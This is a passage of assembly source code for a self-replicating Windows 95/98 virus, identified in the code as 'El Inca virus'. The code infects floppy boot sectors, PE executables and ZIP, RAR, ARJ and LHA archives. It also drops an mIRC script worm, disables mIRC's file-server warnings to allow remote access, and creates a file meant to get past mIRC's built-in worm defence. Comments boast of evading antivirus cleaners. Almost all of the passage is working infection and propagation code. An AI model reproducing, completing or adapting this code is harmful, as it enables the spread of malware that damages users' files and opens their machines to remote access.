         call AllocMemory
         jz ErrorDone
         mov edi, eax
         mov ecx, [PolyDOSFileSize]
         add ecx, PELoaderSize
         call peng                             ;make our cool PE poly (32bit)
         push HEAPNOCOPY
         mov [PolyPESize], ecx
         push ecx
         push edx
         VMMCall _HeapReAllocate
         add esp, 12
         mov [PolyPEBuffer], eax
  InstallAPIHook:
         mov eax, offset32 FONO98_File_System
         push eax                              ;install our file hook
         VxDCall IFSMgr_InstallFileSystemApiHook
         add esp, 4
         mov [NextHook], eax
  InstallV86Hook:
         mov eax, 13h                          ;install our disk hook
         mov esi, offset32 FONO98_Disk_System
         VMMCall Hook_V86_Int_Chain
         clc
         db 0b0h                               ;from here, is a mov al, xx
  ErrorDone:
         db 0fdh                               ;from here, is a stc ;)
         ret
EndProc FONO98_Device_Init



BeginProc FONO98_Disk_System
         pushad
         cmp [FloppyInUse], 0
         jne Exit13Error                       ;dont reenter
         inc [FloppyInUse]
         cmp [OurFile], 0                      ;we're infecting?
         jnz Exit13
         movzx eax, word ptr [ebp.Client_AX]
         movzx ecx, word ptr [ebp.Client_CX]
         movzx edx, word ptr [ebp.Client_DX]
         cmp ax, 201h
         jne Exit13
         cmp cx, 1
         jne Exit13
         or dx, dx
         jnz Exit13                            ;if not floppy boot, exit
  InfectBoot:
         mov ebx, offset32 SectorBuffer
         VxDInt 13h
         jc Exit13
         mov ax, word ptr [ebx]
         cmp al, 0ebh                          ;if sector dont start with a
         jne Exit13                            ;short jump, bail out
         movzx eax, ah
         lea eax, [ebx+eax+2]                  ;calculate destination of
         cmp word ptr [ebx+1feh], 0aa55h       ;jump(to insert out code)
         jne Exit13
         cmp word ptr [ebx.bpb_t_s], 2880      ;is a valid 1.44 floppy?
         jne Exit13
         sub word ptr [ebx.bpb_t_s], 18*2      ;steal 36 sectorz
         push eax
         mov ecx, [PolyBootSize]
         add eax, ecx
         sub eax, ebx
         cmp eax, 510
         pop edi
         jae Exit13                            ;will our code use more space
         mov esi, [PolyBootBuffer]             ;than we have?
         rep movsb
         mov eax, 301h                         ;write our cool boot sector
         inc ecx
         VxDInt 13h
         jc Exit13
         mov eax, 312h
         sub edx, edx
         mov ecx, 4f01h
         mov ebx, [VxDCompressedBuffer]
         VxDInt 13h                            ;write first part of compressed
         jc Exit13                             ;VXD
         mov eax, 312h
         mov edx, 100h
         mov ecx, 4f01h
         mov ebx, [VxDCompressedBuffer]
         add ebx, 512*18                       ;write the second part of it
         VxDInt 13h
         jc Exit13
         mov eax, 0302h
         mov edx, 0100h
         mov ecx, 000fh                        ;write loader to the end of the
         mov ebx, offset32 BootLoader          ;root directory
         VxDInt 13h
         jc Exit13
  Exit13:
         mov [FloppyInUse], 0
  Exit13Error:
         popad
         stc                                   ;service not finished
         ret
EndProc FONO98_Disk_System



BeginProc FONO98_File_System, High_Freq
         push ebp
         mov ebp, esp
         sub esp, 20h
         cmp [ebp+12], IFSFN_Open
         jne ExitNow                           ;only hook FileOpenz
  WeAreUsingAPI:
         cmp [OurFile], 0
         jnz ExitNow                           ;recursive?
         inc [OurFile]
  GetPlainName:
         pushad
         mov ebx, offset32 FileName
         mov eax, [ebp+16]
         cmp al, -1
         je NoDrive
         add al, "@"
         mov byte ptr [ebx], al                ;if drive specificated,
         inc ebx                               ;get it
         mov byte ptr [ebx], ":"
         inc ebx
  NoDrive:
         push BCS_WANSI
         push 255
         mov eax, [ebp+28]
         mov eax, [eax+0ch]
         add eax, 4
         push eax
         push ebx
         VxDCall UniToBCSPAth                  ;make UNICODE a ASCII in our
         add sp, 16                            ;buffer
         mov esi, ebx
         add esi, eax
         sub ebx, 2
         mov byte ptr [esi], 0
         push esi
         mov eax, R0_FILEATTRIBUTES+GET_ATTRIBUTES
         mov esi, offset32 FileName
         VxDCall IFSMgr_Ring0_FileIO
         mov [FileAttr], ecx                   ;save attributes
         jc ExitCorrect
         mov eax, R0_FILEATTRIBUTES+SET_ATTRIBUTES
         xor ecx, ecx
         mov esi, offset32 FileName
         VxDCall IFSMgr_Ring0_FileIO           ;kill attributes
         pop esi
         cmp dword ptr [esi-8], '23CR'
         jne NomIRC                            ;we're opening MIRC32.EXE??
         cmp word ptr [esi-10], 'IM'
         jne NomIRC
         cmp dword ptr [esi-4], 'EXE.'
         jne NomIRC
  DropWorm:
         pushad
         mov eax, R0_OPENCREAT_IN_CONTEXT
         mov ebx, 2
         mov cx, 01b
         mov edx, 11h
         mov esi, offset32 Killer              ;create our payload file
         VxDCall IFSMgr_Ring0_FileIO
         mov ebx, eax
         jc ErrorWorm
         mov eax, R0_WRITEFILE
         mov esi, offset32 KCode               ;write payload code to it
         mov ecx, KCodeSize
         sub edx, edx
         VxDCall IFSMgr_Ring0_FileIO
         mov eax, R0_CLOSEFILE
         VxDCall IFSMgr_Ring0_FileIO           ;close it
         mov eax, R0_OPENCREAT_IN_CONTEXT
         mov ebx, 2
         xor cx, cx
         mov edx, 11h
         mov esi, offset32 MircIni             ;open MIRC.INI
         VxDCall IFSMgr_Ring0_FileIO
         mov ebx, eax
         jc ErrorWorm
         mov eax, R0_GETFILESIZE
         VxDCall IFSMgr_Ring0_FileIO
         jc ErrorWorm
         mov edx, eax
         mov eax, R0_WRITEFILE
         mov esi, offset32 IMircIni            ;set /FSERVER warnings off, so
         mov ecx, InsertSize                   ;we can access this machine
         VxDCall IFSMgr_Ring0_FileIO           ;with impunity ;)
         jc ErrorWorm
         mov eax, R0_CLOSEFILE
         VxDCall IFSMgr_Ring0_FileIO
         mov eax, R0_OPENCREAT_IN_CONTEXT
         mov ebx, 2
         mov ecx, 01b
         mov edx, 11h
         mov esi, offset32 ScriptName2         ;create SCRIPT.NOT, to avoid
         VxDCall IFSMgr_Ring0_FileIO           ;build-in worm defense in
         jc ErrorWorm                          ;mIRC
         mov ebx, eax
         mov eax, R0_CLOSEFILE
         VxDCall IFSMgr_Ring0_FileIO
         mov eax, R0_OPENCREAT_IN_CONTEXT
         mov ebx, 2
         mov ecx, 01b
         mov edx, 11h                          ;create SCRIPT.INI
         mov esi, offset32 ScriptName
         VxDCall IFSMgr_Ring0_FileIO
         jc ErrorWorm
         mov ebx, eax
         mov eax, R0_WRITEFILE
         xor edx, edx
         mov esi, offset32 ScriptIni           ;write our inet spreading worm
         mov ecx, ScriptSize                   ;and get ready to travel! :)
         VxDCall IFSMgr_Ring0_FileIO
         mov eax, R0_CLOSEFILE
         VxDCall IFSMgr_Ring0_FileIO
         mov eax, R0_OPENCREAT_IN_CONTEXT
         mov ebx, 2
         mov ecx, 01b
         mov edx, 11h
         mov esi, offset32 IncaName            ;create virus dropper for inet
         VxDCall IFSMgr_Ring0_FileIO           ;spreading
         jc ErrorWorm
         mov ebx, eax
         mov eax, R0_WRITEFILE
         xor edx, edx
         mov esi, [PolyDOSFileBuffer]
         mov ecx, [PolyDOSFileSize]
         VxDCall IFSMgr_Ring0_FileIO           ;write dropper code
         mov eax, R0_CLOSEFILE
         VxDCall IFSMgr_Ring0_FileIO           ;close it
  ErrorWorm:
         popad
  NomIRC:
         mov eax, dword ptr [esi-4]
         not eax                               ;get extension(with little
         cmp eax, not 'AHL.'                   ;encription to avoid lamerz)
         je LHAInfect
         cmp eax, not 'HZL.'
         je LHAInfect
         cmp eax, not 'KAP.'
         je LHAInfect
         cmp eax, not 'PIZ.'                   ;if archivers, go drop virus
         je InfectZIP
         cmp eax, not 'JRA.'
         je InfectARJ
         cmp eax, not 'RAR.'
         je InfectRAR
         cmp eax, not 'RCS.'
         je InfectExecutableFile
         cmp eax, not 'EXE.'                   ;if EXE or SCR, check for PE
         jne ExitUnmark

  InfectExecutableFile:
         mov eax, R0_OPENCREATFILE
         mov ebx, 2
         xor cx, cx
         mov edx, 11h
         mov esi, offset32 FileName
         VxDCall IFSMgr_Ring0_FileIO           ;open probable host
         mov [FileHandle], eax
         jc ExitUnmark
         mov ebx, eax
         mov eax, R0_GETFILESIZE
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitClose
         mov [FileSize], eax
         cmp eax, MINSIZEINFECT
         jb ExitClose                          ;if too small, exit
         mov eax, R0_READFILE
         mov esi, offset32 CrcTab
         mov ecx, 1024
         xor edx, edx
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitClose
         cmp word ptr [esi], 'ZM'
         je NEPECheck
         cmp word ptr [esi], 'MZ'
         jne ExitClose                         ;must be a EXE file

  NEPECheck:
         mov eax, [FileSize]
         cmp dword ptr [esi+3ch], 0
         jz ExitClose
         cmp dword ptr [esi+3ch], eax          ;probable PE sign in range?
         ja ExitClose

  InfectPE:
         cmp [esi+3ch], 1024
         jae ExitClose
         lea eax, [esi+3ch]
         add esi, [eax]
         cmp dword ptr [esi], 'EP'             ;must be a PE file
         jne ExitClose
         mov eax, R0_CLOSEFILE
         mov ebx, [FileHandle]
         VxDCall IFSMgr_Ring0_FileIO           ;ready to infect, close file
         mov ebp, 32*1024
         call VxDMapFile                       ;map file in memory
         jc ExitUnmark
         call InfectPEFile                     ;infect it!
         call VxDUnMapFile
         jmp ExitUnmark                        ;unmap file

                                               ;this code goes inserted in
                                               ;PE filez, after the poly
  PELoader:                                    ;decription routine
         call set_SEH
         mov esp, [esp+8]
         jmp ReturnHost                        ;if a fault happen, jump host
  set_SEH:
         xor edx, edx                          ;setup a SEH for us
         push dword ptr fs:[edx]
         mov dword ptr fs:[edx], esp
         call PEDelta
  PEDelta:
         pop ebp
         sub ebp, (offset32 PEDelta-offset32 PELoader)
         call AnaliseKernel32                  ;get GetModuleHandleA and
         jc ReturnHost                         ;GetProcAddressA from kernel32
                                               ;export table
         lea esi, [ebp+(offset32 NamePtr-offset32 PELoader)]
         lea edi, [ebp+(offset32 FAdress-offset32 PELoader)]
         cld
  GetFunctionAdress:
         lodsd
         or eax, eax
         jz EndTable
         add eax, ebp
         call MyGetProcAdress                  ;get RVA of all functionz we
         jc ReturnHost                         ;need
         stosd
         jmp GetFunctionAdress
  EndTable:
         sub eax, eax
         push eax
         push 010b
         push 2                                ;create W95INCA.COM in root
         push eax                              ;dir
         push 3
         push 80000000h+40000000h
         lea eax, [ebp+(offset32 PEName-offset32 PELoader)]
         push eax
         call dword ptr [ebp+(offset32 _CreateFile-offset32 PELoader)]
         mov ebx, eax
         inc eax
         jz ReturnHost
         push 0
         lea eax, [ebp+(offset32 nWrite-offset32 PELoader)]
         push eax
         mov eax, 12345678h
    PEDOSSize equ dword ptr $-4
         push eax
         mov eax, ebp
         add eax, offset32 PELoaderSize        ;write the DOS dropper in it
         push eax
         push ebx
         call dword ptr [ebp+(offset32 _WriteFile-offset32 PELoader)]
         push ebx                              ;close the file
         call dword ptr [ebp+(offset32 _CloseHandle-offset32 PELoader)]
         push 0
         lea eax, [ebp+(offset32 PEName-offset32 PELoader)]
         push eax                              ;f0rk DOS process
         call dword ptr [ebp+(offset32 _WinExec-offset32 PELoader)]
         push 3000                             ;have 3 seconds to run
         call dword ptr [ebp+(offset32 _Sleep-offset32 PELoader)]
         lea eax, [ebp+(offset32 PEName-offset32 PELoader)]
         push eax                              ;delete the dropper
         call dword ptr [ebp+(offset32 _DeleteFile-offset32 PELoader)]
  ReturnHost:
         xor edx, edx
         pop dword ptr fs:[edx]
         pop edx
         mov eax, 12345678h                    ;set base
  LoadBase equ dword ptr $-4
         add eax, 12345678h
  OldIP  equ dword ptr $-4                     ;add host entry_point
         push eax
         ret

  AnaliseKernel32:
         mov edx, 0bff70000h                   ;base of KERNEL32 in win95/98
         mov eax, edx
         mov ebx, eax
         add eax, [eax+3ch]
         add ebx, [eax+120]
         lea eax, [ebp+(offset32 gmh-offset32 PELoader)]
                                               ;string is 17 bytes long
         mov [ebp+(offset32 szSearch-offset32 PELoader)], 17
                                               ;and setup pointer
         mov [ebp+(offset32 strSearch-offset32 PELoader)], eax
         call SearchET                         ;search export tabel for it
         jc a_error
         mov dword ptr [ebp+(offset32 pGetModuleHandle-offset32 PELoader)], eax
         lea eax, [ebp+(offset32 gpa-offset32 PELoader)]
                                               ;string is 15 bytes long
         mov [ebp+(offset32 szSearch-offset32 PELoader)], 15
                                               ;and setup pointer
         mov [ebp+(offset32 strSearch-offset32 PELoader)], eax
         call SearchET
         jc a_error
         mov dword ptr [ebp+(offset32 pGetProcAdress-offset32 PELoader)], eax
         lea eax, [ebp+(offset32 kernel-offset32 PELoader)]
         push eax
         mov eax, [ebp+(offset32 pGetModuleHandle-offset32 PELoader)]
         call eax                              ;get KERNEL32 module
         mov dword ptr [ebp+(offset32 pKernel32Adress-offset32 PELoader)], eax
  a_error:
         ret

  MyGetProcAdress:
         push eax
         push dword ptr [ebp+(offset32 pKernel32Adress-offset32 PELoader)]
         mov eax, [ebp+(offset32 pGetProcAdress-offset32 PELoader)]
         call eax
         or eax, eax                           ;call GetProcAddress to get
         jz GPAError                           ;all RVA we need
         test al, 12h
       org $-1                                 ;the good'n'old trick again ;)
  GPAError:
         stc
         ret

  SearchET:
         mov eax, [ebx+32]                     ;search export table of
         add eax, edx                          ;KERNEL32, searching the
  ff:
         mov esi, [eax]                        ;the names, then the ordinal
         or esi, esi                           ;and, finally the RVA pointerz
         jz fuck
         add esi, edx
         mov edi, 12345678h
   strSearch equ dword ptr $-4
         mov ecx, 12345678h
   szSearch equ dword ptr $-4
         rep cmpsb
         jz found
         add eax, 4
         jmp ff
  found:
         sub eax, [ebx+32]
         sub eax, edx
         shr eax, 1
         add eax, [ebx+36]
         add eax, edx
         movzx eax, word ptr [eax]
         shl eax, 2
         add eax, [ebx+28]
         add eax, edx
         mov eax, [eax]
         add eax, edx
         mov cl, 12h
       org $-1
  fuck:
         stc
         ret

kernel   db 'KERNEL32', 0

nWrite             dd 0

pGetProcAdress     dd 0
pGetModuleHandle   dd 0
pKernel32Adress    dd 0bff70000h

gpa      db 'GetProcAddress', 0
gmh      db 'GetModuleHandleA', 0

sCreateFile        db 'CreateFileA', 0
sWriteFile         db 'WriteFile', 0
sCloseHandle       db 'CloseHandle', 0
sWinExec           db 'WinExec', 0
sDeleteFile        db 'DeleteFileA', 0
sSleep             db 'Sleep', 0

NamePtr            equ this byte
                   dd (offset32 sCreateFile-offset32 PELoader)
                   dd (offset32 sWriteFile-offset32 PELoader)
                   dd (offset32 sCloseHandle-offset32 PELoader)
                   dd (offset32 sWinExec-offset32 PELoader)
                   dd (offset32 sDeleteFile-offset32 PELoader)
                   dd (offset32 sSleep-offset32 PELoader)
                   dd 0

PEName             db 'C:\W95INCA.COM', 0

FAdress            equ this byte
_CreateFile        dd 0
_WriteFile         dd 0
_CloseHandle       dd 0
_WinExec           dd 0
_DeleteFile        dd 0
_Sleep             dd 0

PELoaderEnd        equ this byte

PELoaderSize       equ offset32 PELoaderEnd - offset32 PELoader


  InfectPEFile:
         mov ebp, [esi+3ch]                    ;esi point to maped base
         add ebp, esi                          ;ebp point to PE header
         mov eax, 12345678h
         cmp dword ptr [ebp+58h], eax          ;is already infected?
         mov dword ptr [ebp+58h], eax
         je PE_done
         mov eax, dword ptr [ebp+52]
         cmp eax, 400000h                      ;normal base for appz
         mov [LoadBase], eax
         jne PE_done
         movzx eax, word ptr [ebp+4h]
         test eax, 2000h                       ;not infect DLL
         jnz PE_done
         movzx ecx, word ptr [ebp+6]           ;numba of sectionz
         mov eax, 40
         sub edx, edx
         mul ecx
         add eax, ebp
         add eax, 24
         movzx ecx, word ptr [ebp+20]          ;header size
         add eax, ecx
         mov edi, eax                          ;edi point to free entry
         mov edx, eax
         mov ecx, 40
         sub eax, eax
         repz scasb                            ;is really a free entry?
         jnz PE_done
         inc word ptr [ebp+6]                  ;inc number of sectionz
         call rnd                              ;make new name
         and eax, 11b
         add eax, 4
         mov ecx, eax
         mov edi, edx
  mName:
         call rnd                              ;random letter for a random
         and eax, 01111b                       ;name
         add al, 'A'
         stosb
         loop mName
         mov edi, edx
         mov dword ptr [edi+36], 0e0000040h    ;set section attribz
         mov eax, [edi-40+12]                  ;prev virtual address
         add eax, [edi-40+08]                  ;prev virtual size
         call ObjAlign
         mov [edi+12], eax                     ;virtual address
         mov eax, [edi-40+16]                  ;prev offset to data
         add eax, [edi-40+20]                  ;prev size of data
         call FileAlign
         mov [edi+20], eax                     ;offset to data
         push eax
         mov eax, [PolyPESize]
         add eax, [totsize]
         push eax
         call ObjAlign
         mov [edi+8], eax
         add [ebp+80], eax
         pop eax
         call FileAlign
         mov [edi+16], eax
         mov eax, [edi+12]
         mov ebx, [ebp+28h]
         mov [ebp+28h], eax
         mov [OldIP], ebx
         mov eax, [edi+20]
         add eax, [edi+16]
         mov [VMF_size], eax
         pop edi
         add edi, [VMF_base]
         mov esi, [PolyPEBuffer]
         mov ecx, [PolyPESize]
         rep movsb                             ;zopy PE poly to end of file
         mov ecx, 30000h
         call AllocMemory
         push eax
         push edi
         push eax
         mov edi, eax
         mov esi, offset32 PELoader            ;copy the PE loader
         mov ecx, PELoaderSize
         rep movsb
         mov esi, [PolyDOSFileBuffer]
         mov ecx, [PolyDOSFileSize]
         rep movsb                             ;and the DOS loader
         pop esi
         pop edi
         call encript_pe                       ;encript virus code
         pop eax
         call DeAllocMemory
         inc dword ptr [VMF_sucess]            ;is infected!
  PE_done:
         ret

ObjAlign:
         mov ecx, [ebp+56]
         jmp AlignThis
FileAlign:
         mov ecx, [ebp+60]
  AlignThis:
         xor edx, edx
         div ecx
         or edx, edx
         jz sAlign                             ;dont waste aligns when isnt
         inc eax                               ;need
  sAlign:
         mul ecx
         ret


  LHAInfect:
         bt [FileAttr], 0
         jc ExitUnmark                         ;if read-only, exit
         call PreparateDropper                 ;(is our marker)
         dec ebp
         mov edi, offset32 LHAFilename
         call Random4Name                      ;create random name
         mov ecx, [PolyDOSFileSize]
         mov [LHACompressedSize], ecx
         mov [LHAUncompressedSize], ecx
         mov eax, R0_READFILE
         mov ecx, 2
         mov edx, 3
         mov esi, offset32 Pad
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitFree
         xor eax, eax
         xchg word ptr [esi], ax
         cmp ax, 'hl'
         jne ExitFree                          ;is really a LHA/LHZ shit?
         xor ebx, ebx
         mov ecx, LHAHeaderSize-2
         mov esi, offset32 LHAMethod
  CheckSumLoop:
         lodsb
         add bl, al
         loop CheckSumLoop                     ;funny header checksum loop
         mov [LHAHeaderCRC], bl
         mov eax, R0_WRITEFILE
         mov ebx, [FileHandle]
         mov ecx, LHAHeaderSize
         mov esi, offset32 LHASig
         mov edx, ebp
         add ebp, ecx
         VxDCall IFSMgr_Ring0_FileIO
         mov eax, R0_WRITEFILE
         mov ecx, [PolyDOSFileSize]
         mov edx, ebp
         add ebp, ecx
         mov esi, [BufferOneHandle]
         VxDCall IFSMgr_Ring0_FileIO           ;write it
         mov eax, R0_WRITEFILE
         mov ecx, 1
         mov edx, ebp
         mov esi, offset32 Pad
         VxDCall IFSMgr_Ring0_FileIO
         jmp ExitRO

  InfectZIP:
         bt [FileAttr], 0
         jc ExitUnmark
         call PreparateDropper                 ;create dropper
         mov [ZIPRCRC32], eax
         mov [ZIPLCRC32], eax
         mov ecx, [PolyDOSFileSize]
         mov [ZIPRCompressed], ecx
         mov [ZIPRUncompressed], ecx           ;set some ZIP stuff
         mov [ZIPLCompressed], ecx
         mov [ZIPLUncompressed], ecx
         mov edi, offset32 ZIPRFileName
         call Random4Name                      ;random name
         mov eax, dword ptr [ZIPRFileName]
         mov dword ptr [ZIPLFilename], eax
         mov eax, R0_READFILE
         mov ecx, ZIPEHeaderSize
         sub ebp, ecx
         mov edx, ebp
         mov esi, offset32 ZIPReadBuffer
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitFree
         cmp word ptr [ZIPEHeaderId], 'KP'     ;is a ZIP marker
         jne ExitFree
         cmp word ptr [ZIPSignature], 0605h
         jne ExitFree
         cmp dword ptr [ZIPNoDisk], 0
         jnz ExitFree
         inc word ptr [ZIPEntryDisk]
         inc word ptr [ZIPEntrysDir]
         add dword ptr [ZIPSizeDir], ZIPRHeaderSize
         mov eax, [ZIPOffsetDir]
         mov [ZIPROffsetLHeaderR], eax
         mov ebp, eax
         mov ecx, [ZIPSizeDir]
         call AllocMemory
         jz ExitFree
         mov [BufferTwoHandle], eax
         mov esi, eax
         mov eax, R0_READFILE
         mov ecx, [ZIPSizeDir]
         mov edx, ebp
         VxDCall IFSMgr_Ring0_FileIO           ;read tonz of headers and
         jc ExitDealloc                        ;write they back after
         cld                                   ;modificationz
         mov ecx, ZIPRHeaderSize               ;(ZIP really sux)
         mov edi, [BufferTwoHandle]
         add edi, [ZIPSizeDir]
         sub edi, ecx
         mov esi, offset32 ZIPRHeaderId
         rep movsb
         mov eax, R0_WRITEFILE
         mov ecx, offset32 ZIPReadBuffer-offset32 ZIPLHeaderId
         mov edx, ebp
         add ebp, ecx
         mov esi, offset32 ZIPLHeaderId
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitDealloc
         mov eax, R0_WRITEFILE
         mov ecx, [PolyDOSFileSize]
         mov edx, ebp
         add ebp, ecx
         mov [ZIPOffsetDir], ebp
         mov esi, [BufferOneHandle]
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitDealloc
         mov eax, R0_WRITEFILE
         mov ecx, [ZIPSizeDir]
         mov edx, ebp
         add ebp, ecx
         mov esi, [BufferTwoHandle]
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitDealloc
         mov eax, R0_WRITEFILE
         mov ecx, ZIPEHeaderSize
         mov edx, ebp
         mov esi, offset32 ZIPReadBuffer
         VxDCall IFSMgr_Ring0_FileIO
  ExitDealloc:
         mov eax, [BufferTwoHandle]
         call DeallocMemory
         jmp ExitRO

  InfectRAR:
         bt [FileAttr], 0
         jc ExitUnmark                         ;bahh... the same shit, but
         call PreparateDropper                 ;this time for RAR
         mov [RARFileCRC], eax
         mov edi, offset32 RARFileName
         call Random4Name
         mov ecx, [PolyDOSFileSize]
         mov [RARCompressedSize], ecx
         mov [RARUncompressedSize], ecx
         mov eax, R0_READFILE
         mov ecx, 4
         xor edx, edx
         mov esi, offset32 Pad
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitFree
         cmp [esi], '!raR'
         jne ExitFree
         mov esi, offset32 RARHeaderType
         mov edi, offset32 RARHeaderEnd-offset32 RARHeaderType
         call CRC32
         mov [RARHeaderCRC], cx
         mov eax, R0_WRITEFILE
         mov ecx, offset32 RARHeaderEnd-offset32 RARHeaderCRC
         mov esi, offset32 RARHeaderCRC
         mov edx, ebp
         add ebp, ecx
         VxDCall IFSMgr_Ring0_FileIO
         mov eax, R0_WRITEFILE
         mov ecx, [PolyDOSFileSize]
         mov edx, ebp
         mov esi, [BufferOneHandle]
         VxDCall IFSMgr_Ring0_FileIO
         jmp ExitRO

  InfectARJ:
         bt [FileAttr], 0
         jc ExitUnmark
         call PreparateDropper                 ;uhh... again for ARJ
         sub ebp, 4
         mov [ARJFileCRC], eax                 ;(i only do this because there
         mov edi, offset32 ARJFilename         ;stupid peoples that run new
         call Random4Name                      ;strange filez)
         mov ecx, [PolyDOSFileSize]
         mov [ARJCompressedSize], ecx
         mov [ARJUncompressedSize], ecx
         mov eax, R0_READFILE
         mov ecx, 2
         xor edx, edx
         mov esi, offset32 Pad
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitFree
         cmp word ptr [esi], 0ea60h
         jne ExitFree
         mov edi, offset32 ARJHeaderCRC-offset32 ARJ1HeaderSize
         mov esi, offset32 ARJ1HeaderSize
         call CRC32
         mov [ARJHeaderCRC], eax
         mov eax, R0_WRITEFILE
         mov ecx, offset32 ARJEnd-offset32 ARJHeaderId
         mov esi, offset32 ARJHeaderId
         mov edx, ebp
         add ebp, ecx
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitFree
         mov eax, R0_WRITEFILE
         mov ecx, [PolyDOSFileSize]
         mov edx, ebp
         add ebp, ecx
         mov esi, [BufferOneHandle]
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitFree
         mov eax, R0_WRITEFILE
         mov ecx, 4
         mov edx, ebp
         mov esi, offset32 ARJEnd
         VxDCall IFSMgr_Ring0_FileIO

  ExitRO:
         or [FileAttr], 01b                      ;set inf marker(avoid lame
  ExitFree:                                      ;AVs like TBCLEAN, that cant
         mov eax, [BufferOneHandle]              ;clean r-o file)
         call DeAllocMemory
  ExitClose:
         mov eax, R0_CLOSEFILE
         mov ebx, [FileHandle]
         VxDCall IFSMgr_Ring0_FileIO
  ExitUnmark:
         mov eax, R0_FILEATTRIBUTES+SET_ATTRIBUTES
         mov ecx, [FileAttr]
         mov esi, offset32 FileName
         VxDCall IFSMgr_Ring0_FileIO             ;restore attribz
         popad

  ExitCorrect:
         mov [OurFile], 0
  ExitNow:
         mov eax, [ebp+28]
         push eax
         mov eax, [ebp+24]
         push eax
         mov eax, [ebp+20]
         push eax
         mov eax, [ebp+16]
         push eax
         mov eax, [ebp+12]
         push eax
         mov eax, [ebp+8]
         push eax
         mov eax, [nexthook]
         call [eax]                            ;continue next caller
         add esp, 20h
         leave
         ret
EndProc FONO98_File_System


         db 13d, 'El Inca virus', 13d          ;yeahh... this is the name


BeginProc PreparateDropper
         mov eax, R0_OPENCREATFILE
         mov ebx, 2
         xor cx, cx                            ;used for archivers infection
         mov edx, 11h
         mov esi, offset32 FileName
         VxDCall IFSMgr_Ring0_FileIO
         mov [FileHandle], eax                 ;here we get the size of file
         mov ebx, eax                          ;copy some shitz and calculate
         jc ExitUnmark                         ;crc16 and crc32
         mov eax, R0_GETFILESIZE
         VxDCall IFSMgr_Ring0_FileIO
         jc ExitClose
         mov ebp, eax
         cld
         mov ecx, [PolyDOSFileSize]
         call AllocMemory                      ;alloc memory for loader
         jz ExitClose                          ;and vxd
         mov [BufferOneHandle], eax
         mov edi, eax
         mov esi, [PolyDOSFileBuffer]
         mov ecx, [PolyDOSFileSize]
         push ecx
         rep movsb                             ;zopi loader
         pop ecx
         push ecx
         mov esi, [BufferOneHandle]
         push esi
         call CRC16
         mov [LHACRC16], ax                    ;only LHZ use crc16
         pop esi
         pop edi
         call CRC32                            ;crc32 returned in eax for
         ret                                   ;otherz
EndProc PreparateDropper



BeginProc VxDMapFile
         mov eax, R0_OPENCREATFILE             ;hey... i also have a map
         mov ebx, 2                            ;file function... ;)
         xor ecx, ecx
         mov [VMF_sucess], ecx
         mov edx, 11h
         mov esi, offset32 FileName
         VxDCall IFSMgr_Ring0_FileIO
         mov [VMF_handle], eax
         jc VMF_ret
         mov ebx, eax
         mov eax, R0_GETFILESIZE
         VxDCall IFSMgr_Ring0_FileIO
         mov [VMF_size], eax
         jc VMF_close
         push eax
         mov ecx, eax
         add ecx, ebp                          ;alloc enought memory for
         call AllocMemory                      ;file and workspace
         mov [VMF_base], eax
         mov esi, eax
         pop ecx
         jz VMF_close
         mov eax, R0_READFILE
         xor edx, edx                          ;map it out!
         VxDCall IFSMgr_Ring0_FileIO
         jc VMF_free
  VMF_ret:
         ret
EndProc VxDMapFile



BeginProc VxDUnMapFile
         mov ecx, 12345678h
     VMF_sucess equ dword ptr $-4
         jecxz VMF_close                       ;should we update it?
         mov eax, R0_WRITEFILE
         mov ecx, [VMF_size]
         sub edx, edx
         mov ebx, [VMF_handle]
         mov esi, [VMF_base]                   ;write infected PE
         VxDCall IFSMgr_Ring0_FileIO
  VMF_close:
         mov eax, R0_CLOSEFILE
         VxDCall IFSMgr_Ring0_FileIO           ;close it
  VMF_free:
         mov eax, [VMF_base]
         call DeAllocMemory                    ;free allocated memory
         ret
EndProc VxDUnMapFile



BeginProc AllocMemory
         push ecx
         push HEAPSWAP+HEAPZEROINIT
         push ecx
         VMMCall _HeapAllocate                 ;memory allocation routine
         add sp, 8
         or eax, eax
         pop ecx
         ret
EndProc AllocMemory



BeginProc DeAllocMemory
         push 0
         push eax
         VMMCall _HeapFree
         add sp, 8
         ret
EndProc DeAllocMemory



BeginProc CRC32
         cld
         push ebx
         mov ecx, -1                           ;look at this!!!!
         mov edx, ecx
  NextByteCRC:
         xor eax, eax                          ;our crc32 dont need huge
         xor ebx, ebx                          ;tables or shit like...
         lodsb
         xor al, cl                            ;all calculated at runtime
         mov cl, ch
         mov ch, dl
         mov dl, dh
         mov dh, 8
  NextBitCRC:
         shr bx, 1
         rcr ax, 1
         jnc NoCRC
         xor ax, 08320h
         xor bx, 0edb8h
  NoCRC:
         dec dh
         jnz NextBitCRC
         xor ecx, eax
         xor edx, ebx
         dec di
         jnz NextByteCRC
         not edx
         not ecx
         pop ebx
         mov eax, edx
         rol eax, 16
         mov ax, cx                            ;thx2zenghxi
         ret
EndProc CRC32

       VIRSIZE  equ 4000H

gldr:
       cld                                     ;our 16bit poly engine
       mov [pDOSBase], esi                     ;designed for boot and dropperz
       mov edi, offset32 rgtbl
       sub edx, edx
       mov ebx, edx
       push edi
       mov eax, edx
       mov dword ptr [edi-4], eax
       mov ecx, 8
       rep stosw                               ;init regz mirrors
       pop edi
       xchg esi, edi
       mov byte ptr [opcode1], 0b8h
       mov byte ptr [opcode2], 89h
       mov word ptr [_sp], -1
       mov byte ptr [gtype], gfl
 @a1:
       mov ecx, 8
       call creg
       call gopc
       push edi
       mov edi, esi
       sub eax, eax
       repnz scasw                             ;all regz initialized?
       pop edi
       jz @a1
       call rnd
       and eax, 011111b
       adc eax, 8
       mov ecx, eax
 @a2:
       call garble                             ;create some junk
       loop @a2
       cmp byte ptr [maq], 0
       jne maqfile
       mov eax, 00000202h                      ;floppy paramz
       mov ebx, 0001000fh                      ;hi=reg
       mov edx, 00020100h                      ;lo=value
       mov ebp, 00037e00h
       call mxrg                               ;mix order
       mov byte ptr [gtype], gnf
       push eax
       push ebx
       push edx
       push ebp
       mov ecx, 4
 @a8:
       xor eax, eax
       mov edx, eax
       pop ax
       pop dx
       bts word ptr [rgusg], dx
       call mrval
       push ecx
